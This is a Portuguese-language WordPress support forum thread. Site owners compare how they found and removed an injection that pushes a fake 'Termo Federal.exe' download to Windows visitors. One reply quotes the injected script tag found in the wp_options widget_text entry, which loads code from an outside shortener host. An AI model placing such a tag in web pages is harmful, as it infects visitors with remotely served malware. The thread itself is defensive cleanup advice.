Suporte » Ajustando o WordPress » Malware ? Termo Federal.exe no Blog

  • Amigos, de uns dias pra cá , está acontecendo o seguinte, acessando o blog do meu site apenas com windows ( no mac não acontece ) abre a janela abaixo dizendo que precisa aceitar os termos de uso e sugerindo o download do arquivo Termo Federal.exe , nas demais páginas do site está ok , o problema ocorre apenas acessando o blog ou qualquer artigo direto.

    Malware ?

    Desativei todos os plugins que não afetem o visual do site, ficaram apenas 4 ativos

    Plugins

    Alguém tem idéia do que possa ser ? Recomendam atualizar o WP e tb esse plugin que faz parte do visual composer ? E se sim perco alguma configuração atual de layout / conteúdo ?

    Tem algo que eu possa checar diretamente nos códigos do blog / php ?

    Agradeço qualquer ajuda.

    O wp está na raiz, e renomeando o index.php para um em manutenção não tenho como testar sempre estou ativando / desativando para ver se as ações até agora resolveriam mas sem sucesso.

    Scaneando pela ferramenta do google , considerou o site como seguro.

Visualizando 15 respostas - 1 até 15 (de um total de 16)
  • Estou com o mesmo problema acima e num site filantrópico: cantinhodeluz.org.br, pega muito mal, não sei mais onde procurar a solução…

    A mesma coisa acontecendo por aqui também.
    Já tentamos passar diversos antivírus e não conseguimos tirar o Malware.
    Alguém conseguiu?

    Percebi apenas um Iframe nas páginas e postagens, removi e nada, dentro dos arquivos do wp, quais seriam os afetados, vou tentar baixar e procurar algo malicioso neles, alguma ideia? Obrigado a todos!

    Amigos, meu problema foi resolvido pelo pessoal do suporte do provedor, parece que houve um ataque em massa infectando alguns blogs, havia um script malicioso no widget “Testimonials sidebar” que foi removido, por segurança também trocamos as senhas dos admins, e está funcionando corretamente agora.

    Espero que ajude,

    Abs

    Andre

    Verificamos por aqui os widgets e não encontramos códigos maliciosos neles, estamos procurando ainda. Se alguém souber onde poderia estar me avise.
    Grato!

    Abs

    Localizamos e excluímos o código malicioso, estava dentro header.php do theme do site.

    Espero que ajude!

    Abs!

    Muito Obrigado @luciosdf, aparentemente resolvido, tinham 3 linhas de script no header.php e iframe nos títulos das páginas e postagens.

    Grato pelo respeito e dedicação.

    Luis Almeida

    Isso mesmo.. o código inserido em uma das widgets é este abaixo

    <font color=”white”> Leia nossa política de privacidade</font>

    Senhores, bom dia! Procurei nos arquivos header.php , page.php, footer.php e não achei nada. Porém estou com o mesmo problema.

    Vocês tem alguma ideia de onde pode estar? Ou um trecho do código pra que eu possa retirar?

    Obrigado desde já.

    Dentro das postagens e páginas no meu arquivo foram criados iframes por toda parte, mas é grosseiro, apenas ao entrar nas páginas e posts já deve notar, é no h1 mesmo, ridículo esse malware, só pra arrebentar com a paciência

    @luis-almeida, estou procurando nos arquivos php. não estou achando. é bem no index que abre este problema.

    era no front do WP mesmo, porém, também estava no header.php um script malicioso

    Poxa, uso um tema que não está me deixando ver o código da página home. Já procurei nos arquivos e não achei nada. Estou procurando pe,a frase que está no popup.

    “Para continuar você deve …”

    Estou procurando errado?

    Consegui resolver aqui.

    No banco de dados, na tabela wp_options, foi inserido um código malicioso. No meio do registro “widget_text” (no meu caso, id = 80), havia este trecho de código:

    <script src="http://owa.ly/hDBR307Mlau?p=open"></script>

    É só retirar isto que o malware para de aparecer na página.

    O que aconteceu comigo foi um pouco diferente… meu site foi invadido através da falha do WordPress 4.7 e adicionaram um monte de anúncios. Pra resolver foi bem simples, apenas restaurei a pasta wp-admin e wp-includes. No seu caso, recomendo você fazer a restauração de ambas pastas, atualizar para o WordPress 4.7.2, instalar o plugin Wordfence e escanear o site por ele.

    • Esta resposta foi modificada 2 anos, 8 meses atrás por  Vitorxd16.
    • Esta resposta foi modificada 2 anos, 8 meses atrás por  Vitorxd16.
Visualizando 15 respostas - 1 até 15 (de um total de 16)
  • O tópico ‘Malware ? Termo Federal.exe no Blog’ está fechado para novas respostas.